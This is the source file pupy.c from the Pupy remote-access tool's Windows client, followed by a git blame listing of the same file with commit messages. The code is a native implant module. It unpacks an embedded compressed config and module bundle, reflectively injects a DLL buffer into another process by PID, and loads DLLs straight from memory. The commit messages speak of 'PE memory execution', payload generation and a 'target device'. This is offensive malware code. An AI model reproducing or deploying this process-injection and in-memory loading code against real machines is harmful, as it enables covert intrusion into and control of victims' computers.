pupy/client/sources/pupy.c

/*
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
*/

#include "Python-dynload.h"
#include <stdio.h>
#include <windows.h>
#include "MyLoadLibrary.h"
#include "base_inject.h"
static char module_doc[] = "Builtins utilities for pupy";

HMODULE _load_dll(const char *name, const char *bytes);

char pupy_config[32768]="####---PUPY_CONFIG_COMES_HERE---####\n"; //big array to have space for more config / code run at startup. scriptlets also takes more space !
extern const DWORD dwPupyArch;

#include "resources_library_compressed_string_txt.c"
#include "lzmaunpack.c"

static PyObject *Py_get_modules(PyObject *self, PyObject *args)
{
	return PyObject_lzmaunpack(
		resources_library_compressed_string_txt_start,
		resources_library_compressed_string_txt_size
	);
}

static PyObject *
Py_get_pupy_config(PyObject *self, PyObject *args)
{
	union {
		unsigned int l;
		unsigned char c[4];
	} len;

	char *uncompressed;

	len.c[3] = pupy_config[0];
	len.c[2] = pupy_config[1];
	len.c[1] = pupy_config[2];
	len.c[0] = pupy_config[3];

	return PyObject_lzmaunpack(pupy_config+sizeof(int), len.l);
}

static PyObject *Py_get_arch(PyObject *self, PyObject *args)
{
	if(dwPupyArch==PROCESS_ARCH_X86){
		return Py_BuildValue("s", "x86");
	}
	else if(dwPupyArch==PROCESS_ARCH_X64){
		return Py_BuildValue("s", "x64");
	}
	return Py_BuildValue("s", "unknown");
}

static PyObject *Py_reflective_inject_dll(PyObject *self, PyObject *args)
{
	DWORD dwPid;
	const char *lpDllBuffer;
	DWORD dwDllLenght;
	const char *cpCommandLine;
	PyObject* py_is64bit;
	int is64bits;
	if (!PyArg_ParseTuple(args, "Is#O", &dwPid, &lpDllBuffer, &dwDllLenght, &py_is64bit))
		return NULL;
	is64bits = PyObject_IsTrue(py_is64bit);
	if(is64bits){
		is64bits=PROCESS_ARCH_X64;
	}else{
		is64bits=PROCESS_ARCH_X86;
	}
	if(inject_dll( dwPid, lpDllBuffer, dwDllLenght, NULL, is64bits) != ERROR_SUCCESS)
		return NULL;
	return PyBool_FromLong(1);
}

static PyObject *Py_load_dll(PyObject *self, PyObject *args)
{
	DWORD dwPid;
	const char *lpDllBuffer;
	DWORD dwDllLenght;

	const char *dllname;
	if (!PyArg_ParseTuple(args, "ss#", &dllname, &lpDllBuffer, &dwDllLenght))
		return NULL;

	return PyLong_FromVoidPtr(_load_dll(dllname, lpDllBuffer));
}

static PyObject *Py_find_function_address(PyObject *self, PyObject *args)
{
	const char *lpDllName = NULL;
	const char *lpFuncName = NULL;
	void *address = NULL;

	if (PyArg_ParseTuple(args, "ss", &lpDllName, &lpFuncName)) {
		address = MyFindProcAddress(lpDllName, lpFuncName);
	}

	return PyLong_FromVoidPtr(address);
}

static PyMethodDef methods[] = {
	{ "get_pupy_config", Py_get_pupy_config, METH_NOARGS, "get_pupy_config() -> string" },
	{ "get_arch", Py_get_arch, METH_NOARGS, "get current pupy architecture (x86 or x64)" },
	{ "get_modules", Py_get_modules, METH_NOARGS },
	{ "reflective_inject_dll", Py_reflective_inject_dll, METH_VARARGS|METH_KEYWORDS, "reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)\nreflectively inject a dll into a process. raise an Exception on failure" },
	{ "load_dll", Py_load_dll, METH_VARARGS, "load_dll(dllname, raw_dll) -> ptr" },
	{ "find_function_address", Py_find_function_address, METH_VARARGS,
	  "find_function_address(dllname, function) -> address" },
	{ NULL, NULL },		/* Sentinel */
};

DL_EXPORT(void)
initpupy(void)
{
	Py_InitModule3("pupy", methods, module_doc);
}
first commit :-) 2015-09-21 19:53:37 +00:00			`/*`
obfsproxy pluggable transports now works on windows ! ex: ./pupygen --transport obfs3 && ./pupysh --transport obfs3 2015-10-23 17:16:11 +00:00			`# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)`
			`# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms`
first commit :-) 2015-09-21 19:53:37 +00:00			`*/`

			`#include "Python-dynload.h"`
			`#include <stdio.h>`
			`#include <windows.h>`
Fix function address search on amd64 2017-04-24 04:37:00 +00:00			`#include "MyLoadLibrary.h"`
first commit :-) 2015-09-21 19:53:37 +00:00			`#include "base_inject.h"`
			`static char module_doc[] = "Builtins utilities for pupy";`

Fix function address search on amd64 2017-04-24 04:37:00 +00:00			`HMODULE _load_dll(const char name, const char bytes);`

add space in templates for scriptlets 2017-03-31 18:27:12 +00:00			`char pupy_config[32768]="####---PUPY_CONFIG_COMES_HERE---####\n"; //big array to have space for more config / code run at startup. scriptlets also takes more space !`
first commit :-) 2015-09-21 19:53:37 +00:00			`extern const DWORD dwPupyArch;`
Use LZMA instead of ZLib for resources 2016-11-26 09:20:33 +00:00
Rework pupy basic configuration Improve compression: [+] LMZA everywhere (uniformed) [+] Config space 40690 -> 8192 [+] Compress payload libraries (libpython) [+] Compress serialized objects (resources, bootloader, config) [-] Windows build (Makefile) was removed Improve cryptography/credentials default configuration [+] Remove default secrets [-] Android still there [+] Add uniformed class to search proper credentials [+] Generate all credentials on first launch [+] Improve SSL -> CA/Client/Server + roles Client default configuration [+] Add stubbed site.py (to preserve pupy from search files on target device) TODO: [?] Test all that stuff? [?] Rewrite all transport configs to honor roles 2016-11-29 16:53:39 +00:00			`#include "resources_library_compressed_string_txt.c"`
			`#include "lzmaunpack.c"`
Use LZMA instead of ZLib for resources 2016-11-26 09:20:33 +00:00
			`static PyObject Py_get_modules(PyObject self, PyObject *args)`
first commit :-) 2015-09-21 19:53:37 +00:00			`{`
Rework pupy basic configuration Improve compression: [+] LMZA everywhere (uniformed) [+] Config space 40690 -> 8192 [+] Compress payload libraries (libpython) [+] Compress serialized objects (resources, bootloader, config) [-] Windows build (Makefile) was removed Improve cryptography/credentials default configuration [+] Remove default secrets [-] Android still there [+] Add uniformed class to search proper credentials [+] Generate all credentials on first launch [+] Improve SSL -> CA/Client/Server + roles Client default configuration [+] Add stubbed site.py (to preserve pupy from search files on target device) TODO: [?] Test all that stuff? [?] Rewrite all transport configs to honor roles 2016-11-29 16:53:39 +00:00			`return PyObject_lzmaunpack(`
			`resources_library_compressed_string_txt_start,`
			`resources_library_compressed_string_txt_size`
			`);`
			`}`
Use LZMA instead of ZLib for resources 2016-11-26 09:20:33 +00:00
Rework pupy basic configuration Improve compression: [+] LMZA everywhere (uniformed) [+] Config space 40690 -> 8192 [+] Compress payload libraries (libpython) [+] Compress serialized objects (resources, bootloader, config) [-] Windows build (Makefile) was removed Improve cryptography/credentials default configuration [+] Remove default secrets [-] Android still there [+] Add uniformed class to search proper credentials [+] Generate all credentials on first launch [+] Improve SSL -> CA/Client/Server + roles Client default configuration [+] Add stubbed site.py (to preserve pupy from search files on target device) TODO: [?] Test all that stuff? [?] Rewrite all transport configs to honor roles 2016-11-29 16:53:39 +00:00			`static PyObject *`
			`Py_get_pupy_config(PyObject self, PyObject args)`
			`{`
Use LZMA instead of ZLib for resources 2016-11-26 09:20:33 +00:00			`union {`
			`unsigned int l;`
			`unsigned char c[4];`
Rework pupy basic configuration Improve compression: [+] LMZA everywhere (uniformed) [+] Config space 40690 -> 8192 [+] Compress payload libraries (libpython) [+] Compress serialized objects (resources, bootloader, config) [-] Windows build (Makefile) was removed Improve cryptography/credentials default configuration [+] Remove default secrets [-] Android still there [+] Add uniformed class to search proper credentials [+] Generate all credentials on first launch [+] Improve SSL -> CA/Client/Server + roles Client default configuration [+] Add stubbed site.py (to preserve pupy from search files on target device) TODO: [?] Test all that stuff? [?] Rewrite all transport configs to honor roles 2016-11-29 16:53:39 +00:00			`} len;`
Use LZMA instead of ZLib for resources 2016-11-26 09:20:33 +00:00
Rework pupy basic configuration Improve compression: [+] LMZA everywhere (uniformed) [+] Config space 40690 -> 8192 [+] Compress payload libraries (libpython) [+] Compress serialized objects (resources, bootloader, config) [-] Windows build (Makefile) was removed Improve cryptography/credentials default configuration [+] Remove default secrets [-] Android still there [+] Add uniformed class to search proper credentials [+] Generate all credentials on first launch [+] Improve SSL -> CA/Client/Server + roles Client default configuration [+] Add stubbed site.py (to preserve pupy from search files on target device) TODO: [?] Test all that stuff? [?] Rewrite all transport configs to honor roles 2016-11-29 16:53:39 +00:00			`char *uncompressed;`
Use LZMA instead of ZLib for resources 2016-11-26 09:20:33 +00:00
Rework pupy basic configuration Improve compression: [+] LMZA everywhere (uniformed) [+] Config space 40690 -> 8192 [+] Compress payload libraries (libpython) [+] Compress serialized objects (resources, bootloader, config) [-] Windows build (Makefile) was removed Improve cryptography/credentials default configuration [+] Remove default secrets [-] Android still there [+] Add uniformed class to search proper credentials [+] Generate all credentials on first launch [+] Improve SSL -> CA/Client/Server + roles Client default configuration [+] Add stubbed site.py (to preserve pupy from search files on target device) TODO: [?] Test all that stuff? [?] Rewrite all transport configs to honor roles 2016-11-29 16:53:39 +00:00			`len.c[3] = pupy_config[0];`
			`len.c[2] = pupy_config[1];`
			`len.c[1] = pupy_config[2];`
			`len.c[0] = pupy_config[3];`
first commit :-) 2015-09-21 19:53:37 +00:00
Rework pupy basic configuration Improve compression: [+] LMZA everywhere (uniformed) [+] Config space 40690 -> 8192 [+] Compress payload libraries (libpython) [+] Compress serialized objects (resources, bootloader, config) [-] Windows build (Makefile) was removed Improve cryptography/credentials default configuration [+] Remove default secrets [-] Android still there [+] Add uniformed class to search proper credentials [+] Generate all credentials on first launch [+] Improve SSL -> CA/Client/Server + roles Client default configuration [+] Add stubbed site.py (to preserve pupy from search files on target device) TODO: [?] Test all that stuff? [?] Rewrite all transport configs to honor roles 2016-11-29 16:53:39 +00:00			`return PyObject_lzmaunpack(pupy_config+sizeof(int), len.l);`
first commit :-) 2015-09-21 19:53:37 +00:00			`}`
obfsproxy pluggable transports now works on windows ! ex: ./pupygen --transport obfs3 && ./pupysh --transport obfs3 2015-10-23 17:16:11 +00:00
first commit :-) 2015-09-21 19:53:37 +00:00			`static PyObject Py_get_arch(PyObject self, PyObject *args)`
			`{`
			`if(dwPupyArch==PROCESS_ARCH_X86){`
			`return Py_BuildValue("s", "x86");`
			`}`
			`else if(dwPupyArch==PROCESS_ARCH_X64){`
			`return Py_BuildValue("s", "x64");`
			`}`
			`return Py_BuildValue("s", "unknown");`
			`}`

support for loading dlls like pywintypes27.dll needed for pywin32 imports (tried with win32gui, win32api and it worked) 2015-10-14 15:58:43 +00:00			`static PyObject Py_reflective_inject_dll(PyObject self, PyObject *args)`
first commit :-) 2015-09-21 19:53:37 +00:00			`{`
			`DWORD dwPid;`
			`const char *lpDllBuffer;`
			`DWORD dwDllLenght;`
			`const char *cpCommandLine;`
			`PyObject* py_is64bit;`
			`int is64bits;`
			`if (!PyArg_ParseTuple(args, "Is#O", &dwPid, &lpDllBuffer, &dwDllLenght, &py_is64bit))`
			`return NULL;`
			`is64bits = PyObject_IsTrue(py_is64bit);`
PE memory execution ! 2015-10-08 17:36:37 +00:00			`if(is64bits){`
first commit :-) 2015-09-21 19:53:37 +00:00			`is64bits=PROCESS_ARCH_X64;`
PE memory execution ! 2015-10-08 17:36:37 +00:00			`}else{`
first commit :-) 2015-09-21 19:53:37 +00:00			`is64bits=PROCESS_ARCH_X86;`
PE memory execution ! 2015-10-08 17:36:37 +00:00			`}`
first commit :-) 2015-09-21 19:53:37 +00:00			`if(inject_dll( dwPid, lpDllBuffer, dwDllLenght, NULL, is64bits) != ERROR_SUCCESS)`
			`return NULL;`
			`return PyBool_FromLong(1);`
			`}`

support for loading dlls like pywintypes27.dll needed for pywin32 imports (tried with win32gui, win32api and it worked) 2015-10-14 15:58:43 +00:00			`static PyObject Py_load_dll(PyObject self, PyObject *args)`
			`{`
			`DWORD dwPid;`
			`const char *lpDllBuffer;`
			`DWORD dwDllLenght;`
Add (initial) support for loading bundled libraries via ctypes 2017-03-21 16:16:33 +00:00
support for loading dlls like pywintypes27.dll needed for pywin32 imports (tried with win32gui, win32api and it worked) 2015-10-14 15:58:43 +00:00			`const char *dllname;`
			`if (!PyArg_ParseTuple(args, "ss#", &dllname, &lpDllBuffer, &dwDllLenght))`
			`return NULL;`
Add (initial) support for loading bundled libraries via ctypes 2017-03-21 16:16:33 +00:00
			`return PyLong_FromVoidPtr(_load_dll(dllname, lpDllBuffer));`
support for loading dlls like pywintypes27.dll needed for pywin32 imports (tried with win32gui, win32api and it worked) 2015-10-14 15:58:43 +00:00			`}`

Add function to search functions by module and name It wasn't possible to find functions in libraries loaded using memoryloader (Windows) 2016-10-30 21:12:49 +00:00			`static PyObject Py_find_function_address(PyObject self, PyObject *args)`
			`{`
			`const char *lpDllName = NULL;`
			`const char *lpFuncName = NULL;`
			`void *address = NULL;`

			`if (PyArg_ParseTuple(args, "ss", &lpDllName, &lpFuncName)) {`
			`address = MyFindProcAddress(lpDllName, lpFuncName);`
			`}`

			`return PyLong_FromVoidPtr(address);`
			`}`

first commit :-) 2015-09-21 19:53:37 +00:00			`static PyMethodDef methods[] = {`
obfsproxy pluggable transports now works on windows ! ex: ./pupygen --transport obfs3 && ./pupysh --transport obfs3 2015-10-23 17:16:11 +00:00			`{ "get_pupy_config", Py_get_pupy_config, METH_NOARGS, "get_pupy_config() -> string" },`
first commit :-) 2015-09-21 19:53:37 +00:00			`{ "get_arch", Py_get_arch, METH_NOARGS, "get current pupy architecture (x86 or x64)" },`
Use LZMA instead of ZLib for resources 2016-11-26 09:20:33 +00:00			`{ "get_modules", Py_get_modules, METH_NOARGS },`
first commit :-) 2015-09-21 19:53:37 +00:00			`{ "reflective_inject_dll", Py_reflective_inject_dll, METH_VARARGS\|METH_KEYWORDS, "reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)\nreflectively inject a dll into a process. raise an Exception on failure" },`
Add (initial) support for loading bundled libraries via ctypes 2017-03-21 16:16:33 +00:00			`{ "load_dll", Py_load_dll, METH_VARARGS, "load_dll(dllname, raw_dll) -> ptr" },`
Add function to search functions by module and name It wasn't possible to find functions in libraries loaded using memoryloader (Windows) 2016-10-30 21:12:49 +00:00			`{ "find_function_address", Py_find_function_address, METH_VARARGS,`
			`"find_function_address(dllname, function) -> address" },`
first commit :-) 2015-09-21 19:53:37 +00:00			`{ NULL, NULL }, /* Sentinel */`
			`};`

			`DL_EXPORT(void)`
			`initpupy(void)`
			`{`
			`Py_InitModule3("pupy", methods, module_doc);`
			`}`